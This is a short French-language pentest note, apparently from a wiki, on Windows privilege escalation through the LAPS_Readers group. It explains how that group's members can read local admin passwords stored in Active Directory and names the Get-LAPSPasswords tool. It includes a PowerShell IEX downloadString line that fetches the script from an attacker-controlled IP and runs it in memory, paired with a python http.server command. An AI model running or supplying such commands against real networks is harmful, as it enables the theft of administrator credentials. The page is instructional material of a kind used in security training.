LAPS Readers (whoami /priv) - Windows Privilege Escalation

Le groupe LAPS_Readers dans Windows est utilisé pour gérer l'accès aux mots de passe administratifs locaux stockés dans Active Directory (via la fonctionnalité Local Administrator Password Solution, ou LAPS). Les membres de ce groupe peuvent lire les mots de passe générés et stockés par LAPS pour les comptes administratifs locaux sur les machines gérées. Cela permet un accès contrôlé et sécurisé aux mots de passe tout en limitant les privilèges des utilisateurs non autorisés.

Utilisation de Get-LAPSPasswords pour extraire les mots de passe

GitHub - kfosaaen/Get-LAPSPasswords: Powershell function to pull the local admin passwords from LDAP, stored there by LAPS.GitHub

Téléchargement du script Get-LAPSPasswords

python3 -m http.server 80

IEX(New-object Net.WebClient).downloadString('http://10.10.16.4/Get-LAPSPasswords.ps1')

Exécution du script et récupération des mots de passe administratifs

Mis à jour il y a 1 an

hashtagUtilisation de Get-LAPSPasswords pour extraire les mots de passe

hashtagTéléchargement du script Get-LAPSPasswords

hashtagExécution du script et récupération des mots de passe administratifs

Utilisation de Get-LAPSPasswords pour extraire les mots de passe

Téléchargement du script Get-LAPSPasswords

Exécution du script et récupération des mots de passe administratifs